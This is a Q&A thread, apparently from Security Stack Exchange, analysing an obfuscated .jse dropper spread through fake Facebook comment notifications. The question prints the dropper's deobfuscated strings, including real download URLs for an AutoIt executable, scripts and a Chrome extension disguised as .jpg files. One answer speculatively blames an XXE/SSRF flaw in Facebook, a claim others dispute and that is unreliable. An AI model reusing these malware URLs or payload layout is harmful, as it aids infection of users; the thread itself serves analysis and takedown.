92

I got a notification on Facebook: "(a friend of mine) mentioned you in a comment". However, when I clicked it, Firefox tried to download the following file:

comment_24016875.jse

This is an obfuscated script which seems to download an executable (autoit.exe) and run it.

This is the part I managed to deobfuscate:

['Msxml2.XMLhttp', 'onreadystatechange', 'readyState', 'status', 'ADODB.Stream', 'open',
 'type', 'write', 'position', 'read', 'saveToFile', 'close', 'GET', 'send',
 'Scripting.FileSystemObject', 'WScript.Shell', 'Shell.Application', '%APPDATA%\\',
 'ExpandEnvironmentStrings', 'Mozila', 'https://www.google.com',
 'http://userexperiencestatics.net/ext/Autoit.jpg',   '\\autoit.exe',
 'http://userexperiencestatics.net/ext/bg.jpg',       '\\bg.js',
 'http://userexperiencestatics.net/ext/ekl.jpg',      '\\ekl.au3',
 'http://userexperiencestatics.net/ext/ff.jpg',       '\\ff.zip',
 'http://userexperiencestatics.net/ext/force.jpg',    '\\force.au3',
 'http://userexperiencestatics.net/ext/sabit.jpg',    '\\sabit.au3',
 'http://userexperiencestatics.net/ext/manifest.jpg', '\\manifest.json',
 'http://userexperiencestatics.net/ext/run.jpg',      '\\run.bat',
 'http://userexperiencestatics.net/ext/up.jpg',       '\\up.au3',
 'http://whos.amung.us/pingjs/?k=pingjse346',         '\\ping.js',
 'http://whos.amung.us/pingjs/?k=pingjse3462',        '\\ping2.js', '']

Is this an exploit on Facebook? Is it possible that my friend got a virus which targets their contacts by tagging them on malicious links? Should I report this to Facebook? If so, how?

Michael
  • 2,432
  • 2
  • 20
  • 37
Nacib Neme
  • 1,204
  • 2
  • 10
  • 11
  • 12
    Is that link something you re-uploaded or the actual link you were sent? I ask because I would like to get the original link taken down. – Alexander O'Mara Jun 25 '16 at 16:15
  • 1
    That's the original link. – Nacib Neme Jun 25 '16 at 17:22
  • 14
    Well I hope that didn't autorun, because I wasn't expecting my browser to download that when I clicked the link. – JamEngulfer Jun 25 '16 at 18:48
  • I do not believe your friend was targetted. You cannot control the content of noticfications. If anything, facebook itself was exploited with a completely fraudulent notification. – user64742 Jun 28 '16 at 02:51
  • Question from the peanut gallery: Would a reasonable anti-virus package (eg, Norton) have caught this? – Hot Licks Jun 28 '16 at 03:10
  • 1
    I'm dumb but you mean you clicked on the FB notification and *that* notification link got you download the malware or you clicked on whatever link/post your friend tagged you in? – Gruber Jun 28 '16 at 07:10
  • I think the malware is incomplete because it only partially succeded to infect the server, maybe some third-party tool blocked some parts of the malware? – CoffeDeveloper Jun 28 '16 at 09:23

4 Answers4

105

This is a typical obfuscated JavaScript malware which targets the Windows Script Host to download the rest of the payload. In this case, it downloads what appears to be mainly a Chrome Extension (manifest.json and bg.js), the autoit Windows executable, and some autoit scripts which install them. All of these files are named with .jpg extensions on the (likely-compromised) server they are hosted, to be less-conspicuous.

The malware appears to be partially incomplete or otherwise underdeveloped or perhaps based off some other malware (quality is very low). Many of the autoit scripts don't actually do anything, and what appears to be a ZIP meant to contain a Firefox extension is actually empty. The autoit scripts are a ton of includes combined into a single file, but only one (ekl) actually has a payload at the end.

The one active autoit script which runs on infection replaces the Chrome, IE, and possibly other browser shortcuts with a shortcut to Chrome with the necessary arguments to run the malicious Chrome extension.

The Chrome extension is mainly how this malware is being propagated. It does some nasty things like blacklisting antivirus software domains, and sending Facebook messages automatically. Actually there was a webservice back end at http://appcdn.co/datajs serving some scripts which would be injected on any page a user visited based on the URL currently being viewed, which was how the Facebook messages were being posted. This service is now offline, likely taken down.

Is this an exploit on Facebook?

Not exactly, more-like abuse of Facebook. Facebook's code hasn't been exploited, your friend just has an infected browser phishing their contacts on their behalf.

Is it possible that my friend got a virus which targets their contacts by tagging them on malicious links?

Yep, that's exactly how this malware is spreading itself.

Should I report this to Facebook? If so, how?

Yes, see How to Report Things in the Facebook help center.

Getting the following URL's taken offline by contacting their hosts would also be good.

http://userexperiencestatics.net/ext/Autoit.jpg
http://userexperiencestatics.net/ext/bg.jpg
http://userexperiencestatics.net/ext/ekl.jpg
http://userexperiencestatics.net/ext/ff.jpg
http://userexperiencestatics.net/ext/force.jpg
http://userexperiencestatics.net/ext/sabit.jpg
http://userexperiencestatics.net/ext/manifest.jpg
http://userexperiencestatics.net/ext/run.jpg
http://userexperiencestatics.net/ext/up.jpg
http://whos.amung.us/pingjs/?k=pingjse346
http://whos.amung.us/pingjs/?k=pingjse3462
http://appcdn.co/datajs

Unfortunately, CloudFlare still has not taken the userexperiencestatics.net URL's down though I contacted then shortly after posting this answer, and I don't know who is actually hosting these files. CloudFlare just emailed me to say they restricted access to the files, and says they will notify the host.

UPDATE:

After I and likely others reported the .jse URL to Google, they appear to have taken down the file. If you find any more copies, those should also be reported. It seems people have been receiving the files from numerous sources.

MORE INFO:

This malware and post is getting a lot of attention, so I'll add some more info to address people's questions:

Will this file automatically run when downloaded?

Probably not unless you have configured your browser to do so. It is meant to trick you into opening it.

Can it infect my phone, or non-Windows computer.

As far as I know, Windows is the only OS which can run this malware. As I mentioned, it uses the Windows Script Host. I don't believe even Windows phone is vulnerable, though I don't know much about Windows phone.

UPDATE ON RANSOMWARE:

Previously it was assumed the autoit scripts contained ransomware, however after further inspection this appears not to be the case. There is just a bunch of unused crypto function obscuring the actual payload, which I've mostly deobfuscated to this.

UPDATE ON CHROME EXTENSION:

The unpacked Chrome extension code can be viewed here. Details on what it did integrated above.

UPDATE FOR JSE SCRIPT:

My de-obfuscated comment_24016875.jse script can be viewed here.

Alexander O'Mara
  • 8,794
  • 6
  • 34
  • 38
  • 1
    I've reported the `userexperiencestatics.net` URL to Google and MyWOT. The `whos.amung.us` URL appears to simply be some form of analytics. – Nathan Osman Jun 26 '16 at 03:57
  • 2
    @NathanOsman Yep, I reported the `.jse` file to Google earlier, and it appears to have been taken down. I reported the `userexperiencestatics.net` URL's to CloudFlare, but no results yet. – Alexander O'Mara Jun 26 '16 at 04:00
  • 4
    The `.jpg` files are actually PE executable files with the incorrect file extension. They need to be taken down too. – Nathan Osman Jun 26 '16 at 04:01
  • 1
    @NathanOsman Well, one is. Others are JavaScript, autoit scripts, and JSON. – Alexander O'Mara Jun 26 '16 at 04:03
  • 8
    What looks like Facebook's fault to me, the script was downloaded for me when I clicked a link I received from Facebook to my mail (https://facebook.com/l.php?u=https%3A%2F%2Fdoc.google.com…) even though the post itself was deleted by then. I believe that their service was exploited to pass an external URl as a direct link to a comment. This redirect service has been criticized before: http://www.codehesive.com/index.php/archive/facebook-privacy-and-the-mystery-of-l-php/ – Alex Cohn Jun 26 '16 at 13:11
  • @AlexanderO'Mara Could you incorporate that this was indeed an XXE vulnerability in facebooks code, since the link to the malware was not just posted as a comment, but actually sent by facebook to private email accounts ? – Falco Jun 27 '16 at 08:16
  • @Falco Sure, but first could you clarify how you know this happened? I haven't been able to find evidence of it, but I also did not receive one of these email. – Alexander O'Mara Jun 27 '16 at 18:06
  • Re: "The malware appears to be partially incomplete": The author of the malware may not have very high coding standards: from your description, it sounds like a lot of copy-and-pasting happened, or a lot of starting various angles and then discarding them, with no cleanup afterward once (some) stuff was working. – ruakh Jun 27 '16 at 21:26
  • I did receive this email – Alex Cohn Jul 06 '16 at 09:45
29

I haven't got the time to fully reverse-engineer what this script does, but it seems to link to several .jpg files that are actually not images but text, and then references some .au3 files, suggesting that it actually saves those .jpg files under that extension.

Those .au3 files seem to match AutoIt's file extension and indeed they look like valid AutoIt scripts. Here's a part of one, the ekl.jpg:

Func _crypt_startup()
    If __crypt_refcount() = 0 Then
        Local $hadvapi32 = DllOpen("Advapi32.dll")
        If $hadvapi32 = -1 Then Return SetError(1, 0, False)
        __crypt_dllhandleset($hadvapi32)
        Local $iproviderid = $prov_rsa_aes
        Local $aret = DllCall(__crypt_dllhandle(), "bool", "CryptAcquireContext", "handle*", 0, "ptr", 0, "ptr", 0, "dword", $iproviderid, "dword", $crypt_verifycontext)
        If @error OR NOT $aret[0] Then
            Local $ierror = @error + 10, $iextended = @extended
            DllClose(__crypt_dllhandle())
            Return SetError($ierror, $iextended, False)
        Else
            __crypt_contextset($aret[1])
        EndIf
    EndIf
    __crypt_refcountinc()
    Return True
EndFunc

Func _crypt_shutdown()
    __crypt_refcountdec()
    If __crypt_refcount() = 0 Then
        DllCall(__crypt_dllhandle(), "bool", "CryptReleaseContext", "handle", __crypt_context(), "dword", 0)
        DllClose(__crypt_dllhandle())
    EndIf
EndFunc

Func _crypt_derivekey($vpassword, $ialg_id, $ihash_alg_id = $calg_md5)
    Local $aret = 0, $hbuff = 0, $hcrypthash = 0, $ierror = 0, $iextended = 0, $vreturn = 0
    _crypt_startup()
    Do
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptCreateHash", "handle", __crypt_context(), "uint", $ihash_alg_id, "ptr", 0, "dword", 0, "handle*", 0)
        If @error OR NOT $aret[0] Then
            $ierror = @error + 10
            $iextended = @extended
            $vreturn = -1
            ExitLoop
        EndIf
        $hcrypthash = $aret[5]
        $hbuff = DllStructCreate("byte[" & BinaryLen($vpassword) & "]")
        DllStructSetData($hbuff, 1, $vpassword)
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptHashData", "handle", $hcrypthash, "struct*", $hbuff, "dword", DllStructGetSize($hbuff), "dword", $crypt_userdata)
        If @error OR NOT $aret[0] Then
            $ierror = @error + 20
            $iextended = @extended
            $vreturn = -1
            ExitLoop
        EndIf
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptDeriveKey", "handle", __crypt_context(), "uint", $ialg_id, "handle", $hcrypthash, "dword", $crypt_exportable, "handle*", 0)
        If @error OR NOT $aret[0] Then
            $ierror = @error + 30
            $iextended = @extended
            $vreturn = -1
            ExitLoop
        EndIf
        $vreturn = $aret[5]
    Until True
    If $hcrypthash <> 0 Then DllCall(__crypt_dllhandle(), "bool", "CryptDestroyHash", "handle", $hcrypthash)
    Return SetError($ierror, $iextended, $vreturn)
EndFunc

Func _crypt_destroykey($hcryptkey)
    Local $aret = DllCall(__crypt_dllhandle(), "bool", "CryptDestroyKey", "handle", $hcryptkey)
    Local $ierror = @error, $iextended = @extended
    _crypt_shutdown()
    If $ierror OR NOT $aret[0] Then
        Return SetError($ierror + 10, $iextended, False)
    Else
        Return True
    EndIf
EndFunc

Func _crypt_encryptdata($vdata, $vcryptkey, $ialg_id, $bfinal = True)
    Local $ireqbuffsize = 0, $aret = 0, $hbuff = 0, $ierror = 0, $iextended = 0, $vreturn = 0
    _crypt_startup()
    Do
        If $ialg_id <> $calg_userkey Then
            $vcryptkey = _crypt_derivekey($vcryptkey, $ialg_id)
            If @error Then
                $ierror = @error + 100
                $iextended = @extended
                $vreturn = -1
                ExitLoop
            EndIf
        EndIf
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptEncrypt", "handle", $vcryptkey, "handle", 0, "bool", $bfinal, "dword", 0, "ptr", 0, "dword*", BinaryLen($vdata), "dword", 0)
        If @error OR NOT $aret[0] Then
            $ierror = @error + 20
            $iextended = @extended
            $vreturn = -1
            ExitLoop
        EndIf
        $ireqbuffsize = $aret[6]
        $hbuff = DllStructCreate("byte[" & $ireqbuffsize & "]")
        DllStructSetData($hbuff, 1, $vdata)
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptEncrypt", "handle", $vcryptkey, "handle", 0, "bool", $bfinal, "dword", 0, "struct*", $hbuff, "dword*", BinaryLen($vdata), "dword", DllStructGetSize($hbuff))
        If @error OR NOT $aret[0] Then
            $ierror = @error + 30
            $iextended = @extended
            $vreturn = -1
            ExitLoop
        EndIf
        $vreturn = DllStructGetData($hbuff, 1)
    Until True
    If $ialg_id <> $calg_userkey Then _crypt_destroykey($vcryptkey)
    _crypt_shutdown()
    Return SetError($ierror, $iextended, $vreturn)
EndFunc

Func _crypt_decryptdata($vdata, $vcryptkey, $ialg_id, $bfinal = True)
    Local $aret = 0, $hbuff = 0, $htempstruct = 0, $ierror = 0, $iextended = 0, $iplaintextsize = 0, $vreturn = 0
    _crypt_startup()
    Do
        If $ialg_id <> $calg_userkey Then
            $vcryptkey = _crypt_derivekey($vcryptkey, $ialg_id)
            If @error Then
                $ierror = @error + 100
                $iextended = @extended
                $vreturn = -1
                ExitLoop
            EndIf
        EndIf
        $hbuff = DllStructCreate("byte[" & BinaryLen($vdata) + 1000 & "]")
        DllStructSetData($hbuff, 1, $vdata)
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptDecrypt", "handle", $vcryptkey, "handle", 0, "bool", $bfinal, "dword", 0, "struct*", $hbuff, "dword*", BinaryLen($vdata))
        If @error OR NOT $aret[0] Then
            $ierror = @error + 20
            $iextended = @extended
            $vreturn = -1
            ExitLoop
        EndIf
        $iplaintextsize = $aret[6]
        $htempstruct = DllStructCreate("byte[" & $iplaintextsize & "]", DllStructGetPtr($hbuff))
        $vreturn = DllStructGetData($htempstruct, 1)
    Until True
    If $ialg_id <> $calg_userkey Then _crypt_destroykey($vcryptkey)
    _crypt_shutdown()
    Return SetError($ierror, $iextended, $vreturn)
EndFunc

Func _crypt_hashdata($vdata, $ialg_id, $bfinal = True, $hcrypthash = 0)
    Local $aret = 0, $hbuff = 0, $ierror = 0, $iextended = 0, $ihashsize = 0, $vreturn = 0
    _crypt_startup()
    Do
        If $hcrypthash = 0 Then
            $aret = DllCall(__crypt_dllhandle(), "bool", "CryptCreateHash", "handle", __crypt_context(), "uint", $ialg_id, "ptr", 0, "dword", 0, "handle*", 0)
            If @error OR NOT $aret[0] Then
                $ierror = @error + 10
                $iextended = @extended
                $vreturn = -1
                ExitLoop
            EndIf
            $hcrypthash = $aret[5]
        EndIf
        $hbuff = DllStructCreate("byte[" & BinaryLen($vdata) & "]")
        DllStructSetData($hbuff, 1, $vdata)
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptHashData", "handle", $hcrypthash, "struct*", $hbuff, "dword", DllStructGetSize($hbuff), "dword", $crypt_userdata)
        If @error OR NOT $aret[0] Then
            $ierror = @error + 20
            $iextended = @extended
            $vreturn = -1
            ExitLoop
        EndIf
        If $bfinal Then
            $aret = DllCall(__crypt_dllhandle(), "bool", "CryptGetHashParam", "handle", $hcrypthash, "dword", $hp_hashsize, "dword*", 0, "dword*", 4, "dword", 0)
            If @error OR NOT $aret[0] Then
                $ierror = @error + 30
                $iextended = @extended
                $vreturn = -1
                ExitLoop
            EndIf
            $ihashsize = $aret[3]
            $hbuff = DllStructCreate("byte[" & $ihashsize & "]")
            $aret = DllCall(__crypt_dllhandle(), "bool", "CryptGetHashParam", "handle", $hcrypthash, "dword", $hp_hashval, "struct*", $hbuff, "dword*", DllStructGetSize($hbuff), "dword", 0)
            If @error OR NOT $aret[0] Then
                $ierror = @error + 40
                $iextended = @extended
                $vreturn = -1
                ExitLoop
            EndIf
            $vreturn = DllStructGetData($hbuff, 1)
        Else
            $vreturn = $hcrypthash
        EndIf
    Until True
    If $hcrypthash <> 0 AND $bfinal Then DllCall(__crypt_dllhandle(), "bool", "CryptDestroyHash", "handle", $hcrypthash)
    _crypt_shutdown()
    Return SetError($ierror, $iextended, $vreturn)
EndFunc

Func _crypt_hashfile($sfile, $ialg_id)
    Local $btempdata = 0, $hfile = 0, $hhashobject = 0, $ierror = 0, $iextended = 0, $vreturn = 0
    _crypt_startup()
    Do
        $hfile = FileOpen($sfile, $fo_binary)
        If $hfile = -1 Then
            $ierror = 1
            $vreturn = -1
            ExitLoop
        EndIf
        Do
            $btempdata = FileRead($hfile, 512 * 1024)
            If @error Then
                $vreturn = _crypt_hashdata($btempdata, $ialg_id, True, $hhashobject)
                If @error Then
                    $ierror = @error
                    $iextended = @extended
                    $vreturn = -1
                    ExitLoop 2
                EndIf
                ExitLoop 2
            Else
                $hhashobject = _crypt_hashdata($btempdata, $ialg_id, False, $hhashobject)
                If @error Then
                    $ierror = @error + 100
                    $iextended = @extended
                    $vreturn = -1
                    ExitLoop 2
                EndIf
            EndIf
        Until False
    Until True
    _crypt_shutdown()
    If $hfile <> -1 Then FileClose($hfile)
    Return SetError($ierror, $iextended, $vreturn)
EndFunc

Func _crypt_encryptfile($ssourcefile, $sdestinationfile, $vcryptkey, $ialg_id)
    Local $btempdata = 0, $hinfile = 0, $houtfile = 0, $ierror = 0, $iextended = 0, $ifilesize = FileGetSize($ssourcefile), $iread = 0, $breturn = True
    _crypt_startup()
    Do
        If $ialg_id <> $calg_userkey Then
            $vcryptkey = _crypt_derivekey($vcryptkey, $ialg_id)
            If @error Then
                $ierror = @error
                $iextended = @extended
                $breturn = False
                ExitLoop
            EndIf
        EndIf
        $hinfile = FileOpen($ssourcefile, $fo_binary)
        If @error Then
            $ierror = 2
            $breturn = False
            ExitLoop
        EndIf
        $houtfile = FileOpen($sdestinationfile, $fo_overwrite + $fo_createpath + $fo_binary)
        If @error Then
            $ierror = 3
            $breturn = False
            ExitLoop
        EndIf
        Do
            $btempdata = FileRead($hinfile, 1024 * 1024)
            $iread += BinaryLen($btempdata)
            If $iread = $ifilesize Then
                $btempdata = _crypt_encryptdata($btempdata, $vcryptkey, $calg_userkey, True)
                If @error Then
                    $ierror = @error + 400
                    $iextended = @extended
                    $breturn = False
                EndIf
                FileWrite($houtfile, $btempdata)
                ExitLoop 2
            Else
                $btempdata = _crypt_encryptdata($btempdata, $vcryptkey, $calg_userkey, False)
                If @error Then
                    $ierror = @error + 500
                    $iextended = @extended
                    $breturn = False
                    ExitLoop 2
                EndIf
                FileWrite($houtfile, $btempdata)
            EndIf
        Until False
    Until True
    If $ialg_id <> $calg_userkey Then _crypt_destroykey($vcryptkey)
    _crypt_shutdown()
    If $hinfile <> -1 Then FileClose($hinfile)
    If $houtfile <> -1 Then FileClose($houtfile)
    Return SetError($ierror, $iextended, $breturn)
EndFunc

Func _crypt_decryptfile($ssourcefile, $sdestinationfile, $vcryptkey, $ialg_id)
    Local $btempdata = 0, $hinfile = 0, $houtfile = 0, $ierror = 0, $iextended = 0, $ifilesize = FileGetSize($ssourcefile), $iread = 0, $breturn = True
    _crypt_startup()
    Do
        If $ialg_id <> $calg_userkey Then
            $vcryptkey = _crypt_derivekey($vcryptkey, $ialg_id)
            If @error Then
                $ierror = @error
                $iextended = @extended
                $breturn = False
                ExitLoop
            EndIf
        EndIf
        $hinfile = FileOpen($ssourcefile, $fo_binary)
        If @error Then
            $ierror = 2
            $breturn = False
            ExitLoop
        EndIf
        $houtfile = FileOpen($sdestinationfile, $fo_overwrite + $fo_createpath + $fo_binary)
        If @error Then
            $ierror = 3
            $breturn = False
            ExitLoop
        EndIf
        Do
            $btempdata = FileRead($hinfile, 1024 * 1024)
            $iread += BinaryLen($btempdata)
            If $iread = $ifilesize Then
                $btempdata = _crypt_decryptdata($btempdata, $vcryptkey, $calg_userkey, True)
                If @error Then
                    $ierror = @error + 400
                    $iextended = @extended
                    $breturn = False
                EndIf
                FileWrite($houtfile, $btempdata)
                ExitLoop 2
            Else
                $btempdata = _crypt_decryptdata($btempdata, $vcryptkey, $calg_userkey, False)
                If @error Then
                    $ierror = @error + 500
                    $iextended = @extended
                    $breturn = False
                    ExitLoop 2
                EndIf
                FileWrite($houtfile, $btempdata)
            EndIf
        Until False
    Until True
    If $ialg_id <> $calg_userkey Then _crypt_destroykey($vcryptkey)
    _crypt_shutdown()
    If $hinfile <> -1 Then FileClose($hinfile)
    If $houtfile <> -1 Then FileClose($houtfile)
    Return SetError($ierror, $iextended, $breturn)
EndFunc

Func _crypt_genrandom($pbuffer, $isize)
    _crypt_startup()
    Local $aret = DllCall(__crypt_dllhandle(), "bool", "CryptGenRandom", "handle", __crypt_context(), "dword", $isize, "struct*", $pbuffer)
    Local $ierror = @error + 10, $iextended = @extended
    _crypt_shutdown()
    If $ierror OR (NOT $aret[0]) Then
        Return SetError($ierror, $iextended, False)
    Else
        Return True
    EndIf
EndFunc

Func __crypt_refcount()
    Return $__g_acryptinternaldata[0]
EndFunc

Func __crypt_refcountinc()
    $__g_acryptinternaldata[0] += 1
EndFunc

Func __crypt_refcountdec()
    If $__g_acryptinternaldata[0] > 0 Then $__g_acryptinternaldata[0] -= 1
EndFunc

Func __crypt_dllhandle()
    Return $__g_acryptinternaldata[1]
EndFunc

Func __crypt_dllhandleset($hadvapi32)
    $__g_acryptinternaldata[1] = $hadvapi32
EndFunc

Func __crypt_context()
    Return $__g_acryptinternaldata[2]
EndFunc

Func __crypt_contextset($hcryptcontext)
    $__g_acryptinternaldata[2] = $hcryptcontext
EndFunc

As you can see there is crypto-related code suggesting this is a (quite crappy and amateur) ransomware. Feel free to reverse engineer everything else.

André Borie
  • 12,736
  • 3
  • 40
  • 76
  • 1
    The referenced AutoIt - Script is just an official include (Crypt.au3), it does not contain any active code. It is necessary because the virus gets compiled locally to prevent checksum recognition. While the existence of a crypto include may be a good indicator of using crypto, it doesnt mean its ransomware. AutoIt has enough tools to be good ransomware anyways. – James Cameron Jun 27 '16 at 09:03
  • @JamesCameron is right, the autoit scripts are actually just concatenated with a bunch of dependency headers. Only one actually has any activate code from what I see in addition to the code shared by all the scripts. – Alexander O'Mara Jun 27 '16 at 20:48
15

From what it looks like, a malicious actor leverage what is known as a XML External Entity vulnerability (XXE) and then a Server-Side Request Forgery (SSRF).

Facebook's servers were tricked into linking a malicious XML file from another domain, processing it and served it up to you. Here is the XXE cheat sheet and SSRF bible's cheat sheet, if you're interested you can study up on it.

Think about it...your obfuscated script had the following (msxml2.XMLhttp method and stated it came from google).

Specifically, it used "the ADODB.Stream Object to Send Binary Files to the Browser through ASP."

In short, yes, it leveraged an XXE (via asp writing an xml document) and forged (SSRF) it stating it came from google.

grepNstepN
  • 610
  • 4
  • 15
  • Can you clarify how you arrived at this conclusion? – Alexander O'Mara Jun 27 '16 at 17:23
  • 1
    Think about it...your obfuscated script had the following (msxml2.XMLhttp method and stated it came from google). Specifically, it used "the ADODB.Stream Object to Send Binary Files to the Browser through ASP" checkout this link https://support.microsoft.com/en-us/kb/276488 in short, yes, it leveraged an XXE (via asp writing an xml document) and forged (SSRF) it stating it came from google. Read the link, it explains the aforementioned ADODB class to send a file – grepNstepN Jun 28 '16 at 13:51
  • Umm, that script is for downloading the remaining malware files as binary files and running them. It does not itself post anything to Facebook (script does not contain any reference to Facebook), nor could it because it runs in Windows Script Host which would not have any active browser sessions. The Chrome extension it installed was responsible for making the forged Facebook messages. I'll add the de-obfuscated script to my answer. – Alexander O'Mara Jun 28 '16 at 16:47
  • Correct me if im wrong, but the asker clicked a link in a Facebook message that downloads then runs a script, which means its technically from facebook (same-origin policy). Said script states its downloading info from google (see earlier link). As an aside thanks for telling us about the payload Alexander! Thats some good DFIR. However his question is the realm of network security...infosec can be boiled down to finding vulns (bughunting), defense in depth & early warning (netSec) and responding after an attack (DFIR). If you skip the netSec and bughunting, then youre doing infosec wrong. – grepNstepN Jun 28 '16 at 17:42
  • Please note: Im addressing the part of his question on whether this was an exploit (from his description it is) and how the script was downloaded (via XXE and SSRF). There's a saying thats popular on the full disclosure mailing list [seclists.org/fulldisclosure]: Yes, locally ran programs lead to exploitation. From an attacker AND defender's standpoint, once you got your payload on the box (once its downloaded) and you can execute it, its game over. – grepNstepN Jun 28 '16 at 17:43
10

Is this an exploit on Facebook?

Most likely. The unscrupulous are always trying to find ways to gain access to bank accounts, passwords, friend lists, and anything else they can do to turn a buck.

Is it possible that my friend got a virus which targets their contacts by tagging them on malicious links?

There's no reason to think otherwise. The majority of computer users don't even know what a virus is, how to "catch" a virus, or what to do once they've been infected. If it were me, I'd track down the friend, send them a link to an antivirus program, and offer to help them out. Of course, depending on your friends, you might not be so kind, but I'm a fairly strong believer that I'm meant to help humanity as best I can.

Should I report this to Facebook?

Definitely. It won't get your friend in trouble, but it may help them track down the shares and ultimately reduce the number of people that are affected by this virus/malware/scam.

If so, how?

Go to the original post, click on the option to flag the post, and go through the wizard. You'll be notified if they take action, I believe.

One final note: Microsoft already seems to be aware of this file; when I tried to download it in IE Edge, I received a warning that the file was dangerous and could not be saved. Anyone using SmartScreen will probably be safe, and this virus doesn't appear to target non-Microsoft systems. Most likely, most of your less-savvy friends and family should be okay, unless they're still running XP, in which case you should suggest they upgrade to at least 7.

phyrfox
  • 5,724
  • 21
  • 24
  • 2
    *"send them a link to an antivirus program"* Tell them to do a clean install instead. Said malware also tries to blacklist antivirus software in Chrome at least. – Alexander O'Mara Jun 25 '16 at 16:57
  • 2
    I cannot "go to the original post". Clicking the notification redirects me directly to the download. – Nacib Neme Jun 25 '16 at 17:26